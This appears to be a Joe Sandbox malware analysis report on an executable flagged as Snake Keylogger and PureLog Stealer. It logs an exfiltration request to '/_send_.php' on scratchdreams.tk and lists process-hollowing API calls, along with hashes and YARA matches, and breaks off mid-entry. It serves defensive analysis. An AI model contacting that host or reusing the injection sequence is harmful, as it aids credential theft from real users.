16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-05-02 06:00:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49726	104.21.27.85	443	7264	C:\Users\user\Desktop\DNXS-04-22.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 06:00:32 UTC	79	OUT	GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
2024-05-02 06:01:12 UTC	735	IN	HTTP/1.1 522 Date: Thu, 02 May 2024 06:01:12 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yx0Kc6wLIed6aJqNJXV6v9%2F1E1ztQV3DExMVFAOreMaaeGYXfGLRrMIY1my5HTMYmRrPYcG0XUmdvxNEXHgj6qyhKfJ85g%2BRI4FfMyH2s2RKXO7uj89qg%2BnOunLTx9CB7Yh6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 87d5caa73e477287-EWR alt-svc: h3=":443"; ma=86400
2024-05-02 06:01:12 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Target ID:	0
Start time:	08:00:11
Start date:	02/05/2024
Path:	C:\Users\user\Desktop\DNXS-04-22.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DNXS-04-22.exe"
Imagebase:	0x8c0000
File size:	888'832 bytes
MD5 hash:	64932C473D74FBDFDB706A094543CF37
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1366480871.0000000007570000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1359852790.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:00:12
Start date:	02/05/2024
Path:	C:\Users\user\Desktop\DNXS-04-22.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\DNXS-04-22.exe"
Imagebase:	0x370000
File size:	888'832 bytes
MD5 hash:	64932C473D74FBDFDB706A094543CF37
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:00:12
Start date:	02/05/2024
Path:	C:\Users\user\Desktop\DNXS-04-22.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DNXS-04-22.exe"
Imagebase:	0x6f0000
File size:	888'832 bytes
MD5 hash:	64932C473D74FBDFDB706A094543CF37
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	99.2%
Signature Coverage:	0%
Total number of Nodes:	399
Total number of Limit Nodes:	22

Executed Functions

Function 05E586B0 Relevance: 2.4, Instructions: 2424
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1365170666.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e50000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef26cff8cb573759e41b1123c65c66a22f4217993a843c0440fce9493dae260b
Instruction ID: f14dbca502ada34e307b4b19584265130f6c0537433d2b5ec9d8b493eab01332
Opcode Fuzzy Hash: ef26cff8cb573759e41b1123c65c66a22f4217993a843c0440fce9493dae260b
Instruction Fuzzy Hash: A143C634A01618CFCB65DF24DC98AAAB7B2FF89311F1151E9E5096B361DB31AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 075B4070 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

t, xrefs: 075B40CC, 075B40EA

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID: t
API String ID: 0-4213291413
Opcode ID: 5df2bcc8785315612674a37ddb6976e811f5fb4ef80e8ee76fdb611a19642c31
Instruction ID: a10a3c79f8a55c8c116fbd47cbfb3e06124878b1c4ea60069892f7a36afb2553
Opcode Fuzzy Hash: 5df2bcc8785315612674a37ddb6976e811f5fb4ef80e8ee76fdb611a19642c31
Instruction Fuzzy Hash: D141F5B5E016099FDB18DFAAD5406EEFBF2FF88300F14C12AE408A7355DB3499428B90

Uniqueness

Uniqueness Score: -1.00%

Function 07F33578 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818b021e319d9bf5c37550e6dff2d8b101128d97b88d968c0beaa64d5f7e22ef
Instruction ID: 0e93d86446eb0b0329d7fd5a36e22cee742198930333463797d89d71f45b72ba
Opcode Fuzzy Hash: 818b021e319d9bf5c37550e6dff2d8b101128d97b88d968c0beaa64d5f7e22ef
Instruction Fuzzy Hash: 26527D74A0035ACFDB14DF28C844B99B7B2FF85314F2582A9D5586F3A1DB71A982CF81

Uniqueness

Uniqueness Score: -1.00%

Function 07F33568 Relevance: .6, Instructions: 575COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a8281e0653c96ac2b7642953949f6c3c307f9c52768169f755bc51d8f091cd
Instruction ID: c33acf09d8dbdc6beae56c4f624beeff11a2bcb6b009b14f07634ac579409bdb
Opcode Fuzzy Hash: 72a8281e0653c96ac2b7642953949f6c3c307f9c52768169f755bc51d8f091cd
Instruction Fuzzy Hash: 80527B74A0035ACFDB10DF28C844B98B7B2FF85314F2582A9D5586F3A1DB71A986CF81

Uniqueness

Uniqueness Score: -1.00%

Function 075BDA5D Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 075BDC9E

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9631a2a2ec204bdfcfe065861f17c06f77f2c470aae8fb131244bbecda682010
Instruction ID: d627e403929d5c31288cba70b4aac7aee2527682abdae2b7afc0a09528f31863
Opcode Fuzzy Hash: 9631a2a2ec204bdfcfe065861f17c06f77f2c470aae8fb131244bbecda682010
Instruction Fuzzy Hash: B6A17FB1E0071ADFEB24DF68C8417EDBBB2BF44310F1485AAD848A7250DB759985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 075BDA68 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 075BDC9E

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2c9d6f7283275f3133705510eee2a28f6a657f8a365c0de0d243d95a05c27c53
Instruction ID: 58ae61f490178a131b635b09aa9be04d383db1e0da1e8e20afb09845722ae79b
Opcode Fuzzy Hash: 2c9d6f7283275f3133705510eee2a28f6a657f8a365c0de0d243d95a05c27c53
Instruction Fuzzy Hash: A9914DB1E0071ADFDB24DF68C8417EDBBB2BF44310F1485AAD848A7290DB759985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02C5B148 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02C5B39E

Memory Dump Source

Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6b736a86732c3fa3cde4f2c2149230729ffbfbb114b6e5d482a1eccaaf91b0b8
Instruction ID: a671e7c971fbff0dabe373e2b1bcc8723c1641c17eb3a9381a021d17838d14e0
Opcode Fuzzy Hash: 6b736a86732c3fa3cde4f2c2149230729ffbfbb114b6e5d482a1eccaaf91b0b8
Instruction Fuzzy Hash: 53715770A00B158FD724DF6AD44475ABBF2FF88304F008A2DD88AD7A54DB74E985CB95

Uniqueness

Uniqueness Score: -1.00%

Function 05E51C90 Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E51E02

Memory Dump Source

Source File: 00000000.00000002.1365170666.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e50000_DNXS-04-22.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5ddc694ea5f5d8f8c94c461844a9e8d9499e4f08ee17f03db400de98c2f53604
Instruction ID: 7251a01f72b7e4083eec7a62e86d00d6a5e1e699a623fb64114e666ca7a02eb9
Opcode Fuzzy Hash: 5ddc694ea5f5d8f8c94c461844a9e8d9499e4f08ee17f03db400de98c2f53604
Instruction Fuzzy Hash: CD51FEB2C00349AFDF16CFA9C984ADDBFB6BF48314F15816AE848AB220D7719855CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05E51110 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E51E02

Memory Dump Source

Source File: 00000000.00000002.1365170666.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e50000_DNXS-04-22.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 672d758c8765646c2e9802b26cac3fd0d76e1b1c023672b45a5638fc9e193ea6
Instruction ID: d21f8c75f24c2029aae7615766d67bd80a83a7379444034b6b8554e843a210b9
Opcode Fuzzy Hash: 672d758c8765646c2e9802b26cac3fd0d76e1b1c023672b45a5638fc9e193ea6
Instruction Fuzzy Hash: 7751B1B1D00349DFDB14CF99C884ADEBBB6FF48310F64812AE859AB250DB759845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05E51264 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05E54371

Memory Dump Source

Source File: 00000000.00000002.1365170666.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e50000_DNXS-04-22.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 7e69d8fd955c52463f316610eb241ca80ff55ae3ac5867c6777ae21c18f41150
Instruction ID: 4d66d2a0a4ca3a6fc76aca0743044ef53dd546f801e7e49d5cef197bcee65dab
Opcode Fuzzy Hash: 7e69d8fd955c52463f316610eb241ca80ff55ae3ac5867c6777ae21c18f41150
Instruction Fuzzy Hash: FA410974A003098FDB14CF99D488BAAFBF5FF88324F258459D959AB361D774A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C544C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02C559C9

Memory Dump Source

Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1860b01f6d194a4d371c7d3f59ca7210c9b71c941d74e2a00ba03a50bbd08337
Instruction ID: 8e6e833f089ed67e746c9c0ca5b39531856c63a8ec6e9cf45534fa0243f0edba
Opcode Fuzzy Hash: 1860b01f6d194a4d371c7d3f59ca7210c9b71c941d74e2a00ba03a50bbd08337
Instruction Fuzzy Hash: BE41E271D00719CFDB24DFA9C884B9EBBB5FF84704F60806AD508AB251DB756945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02C5590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02C559C9

Memory Dump Source

Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c972dfc1560b2feb631344338db3656686d348f703e14631b98c7004d4ed2d03
Instruction ID: 5d1c6dda64645e30b5428b91f1a8aa40d0a769c91f6ad9d60cffd0fd1fefe976
Opcode Fuzzy Hash: c972dfc1560b2feb631344338db3656686d348f703e14631b98c7004d4ed2d03
Instruction Fuzzy Hash: 0C41F2B1D00719CFEB24DFA9C884B9DBBF5BF88704F60806AD508AB250DB756946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 075BD7D8 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 075BD870

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 124f90b3e66f0d1b3bcd8b9975f692d3c82fc33cec1ad7c760a29c1aae28272d
Instruction ID: 23fb0ffd5fbfda827ba863636274f27723873d07c2269046a21ea1bb29d6fbaa
Opcode Fuzzy Hash: 124f90b3e66f0d1b3bcd8b9975f692d3c82fc33cec1ad7c760a29c1aae28272d
Instruction Fuzzy Hash: E7214BB19003099FDB10CFA9C881BEEBBF5FF48310F108429E958A7340C7789545CB60

Uniqueness

Uniqueness Score: -1.00%

Function 075BD7E0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 075BD870

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f1b0bce767ec1e70c05027f6b620ced9d94684e94ee410b7b65def6d50fedbed
Instruction ID: 05ff06b84209f19e6ce4f30299e86f4533af937d6d109666e6242f2967c456dc
Opcode Fuzzy Hash: f1b0bce767ec1e70c05027f6b620ced9d94684e94ee410b7b65def6d50fedbed
Instruction Fuzzy Hash: 20213BB5D003099FDB10DFA9C8857EEBBF5FF48310F10842AE958A7240C7799544DB60

Uniqueness

Uniqueness Score: -1.00%

Function 075BD640 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075BD6C6

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: cde4981aa7325827088289d49167f139cee5bc35908bb20e44501e8b2b2a6db5
Instruction ID: 420184ce368ce7355e4d702d9585efbdecdf1f6477c53f741c2910464b8ce046
Opcode Fuzzy Hash: cde4981aa7325827088289d49167f139cee5bc35908bb20e44501e8b2b2a6db5
Instruction Fuzzy Hash: 44216AB59007498FDB10DFAAC4857EEBBF4FF88310F14842AD559A7240DB789945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C5B034 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C5D5CE,?,?,?,?,?), ref: 02C5D68F

Memory Dump Source

Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 24cb298edda1cf250a2e8555e6984c62d3e815448ab1acc0744c4a26eb481141
Instruction ID: 27265741936a5d602bb2c81da4eada34eb685b843cff9745b315a831cf3b90a1
Opcode Fuzzy Hash: 24cb298edda1cf250a2e8555e6984c62d3e815448ab1acc0744c4a26eb481141
Instruction Fuzzy Hash: 892116B59003099FDB10CF9AD484ADEFBF8FB48310F10841AE958A3350D378A955CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 075BD8C9 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075BD950

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 18cac0423b85ca5f6ae80c1f6147c6f1181c606cd581fcb2dbeb91cea4b42e9b
Instruction ID: 7c3223e7ceebc65d62632881d77752a055208960e091adc653eaa4df21c7d608
Opcode Fuzzy Hash: 18cac0423b85ca5f6ae80c1f6147c6f1181c606cd581fcb2dbeb91cea4b42e9b
Instruction Fuzzy Hash: 65213B719003499FDB10DFAAC8807EEBBF5FF48310F108429E958A7240D7759901DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C5D600 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C5D5CE,?,?,?,?,?), ref: 02C5D68F

Memory Dump Source

Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 75cae0538f284270b79c3988d5e5c612c08e72005a5ce229e84aa585f6504ba0
Instruction ID: aae0c7c27d405ed4272258563936220204988d088940c503f444003ff8c621d1
Opcode Fuzzy Hash: 75cae0538f284270b79c3988d5e5c612c08e72005a5ce229e84aa585f6504ba0
Instruction Fuzzy Hash: DC21E5B59003099FDB10CFAAD984ADEBBF4FB48310F14841AE958A3350D774A955CF65

Uniqueness

Uniqueness Score: -1.00%

Function 075BD648 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075BD6C6

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 95e1be8cb4eb41ba7e9002aa6da80bc99ee69aa8abd018e1641c370780e096eb
Instruction ID: 22bfcdbd851b0ab48c78debb39d6b134f155c3af53946f357aeecdb6110c16e4
Opcode Fuzzy Hash: 95e1be8cb4eb41ba7e9002aa6da80bc99ee69aa8abd018e1641c370780e096eb
Instruction Fuzzy Hash: 262138B19007098FDB20DFAAC4857EEBBF4FF88320F14842AD559A7240CB789945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 075BD8D0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075BD950

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: faed38da1a2c04b74ba827f0ca6a98976da09a964cff9cd5be46a26c75e4d9f2
Instruction ID: 9537fd747a72016c9253dc276960888a88623fab9fd593ac2624f1e1e6dfa016
Opcode Fuzzy Hash: faed38da1a2c04b74ba827f0ca6a98976da09a964cff9cd5be46a26c75e4d9f2
Instruction Fuzzy Hash: A92128B190034A9FDB10DFAAC880BEEBBF5FF48310F10842AE958A7240C7799504DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 075BD718 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 075BD78E

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 24c5e8440949414d3da543cf978c7272b71daf82d8c9440fc8a74a885f94af63
Instruction ID: abc9ed2c4bc5e2c6deec5358bd483ff984596af670ec6217e2e88d84c82a7bee
Opcode Fuzzy Hash: 24c5e8440949414d3da543cf978c7272b71daf82d8c9440fc8a74a885f94af63
Instruction Fuzzy Hash: D221897590034A9FCB20DFAAC844BEEBBF5FF88320F248819E559A7250C7759504DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C5AE58 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C5B419,00000800,00000000,00000000), ref: 02C5B60A

Memory Dump Source

Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 74b6c737d1d8b4413b062bdbf52ea89db860ffdc1a7f0d70fa7e23471d287987
Instruction ID: 98a6e6cebb1b95c5dd36f4c97d3d02105bcffed4723a0bacd48dde5354707976
Opcode Fuzzy Hash: 74b6c737d1d8b4413b062bdbf52ea89db860ffdc1a7f0d70fa7e23471d287987
Instruction Fuzzy Hash: 091126B69003098FDB14CF9AD444BDEFBF4EB88314F10842EE919A7210C775A945CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 02C5B598 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C5B419,00000800,00000000,00000000), ref: 02C5B60A

Memory Dump Source

Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 159b66cbd8fbc586967b74e0303882f173434ad5a5ff4822e02757f01c6769b7
Instruction ID: 34d31e7bcd4cc25ee588b8e98924053a067b2d738ede554fd96cc27d96278874
Opcode Fuzzy Hash: 159b66cbd8fbc586967b74e0303882f173434ad5a5ff4822e02757f01c6769b7
Instruction Fuzzy Hash: BF11E4B69003099FDB14CFAAC444BDEFBF4EB88714F14841AE919A7240C775A545CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 075BD720 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 075BD78E

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1d0747148840e090079a9188553b2a72c2d7bc664748773ed2dea388cbe581d8
Instruction ID: 1ba81f020eb5a8096bffd100acdb0fcb50df7977194c28ca2b51595ecb9d315d
Opcode Fuzzy Hash: 1d0747148840e090079a9188553b2a72c2d7bc664748773ed2dea388cbe581d8
Instruction Fuzzy Hash: 8111377590034A9FDB20DFAAC844BEEBBF5FF88720F148819E519A7250C7799544DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 075BD590 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 075BD5FA

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0999aeecbf769e7059030ab81fac403306626a2210a1d3878ba647f17f0ff3d2
Instruction ID: feb177c5b280295c6b464ed0ff631cfd15c8add92c07ae6aef2119cb1ca6e763
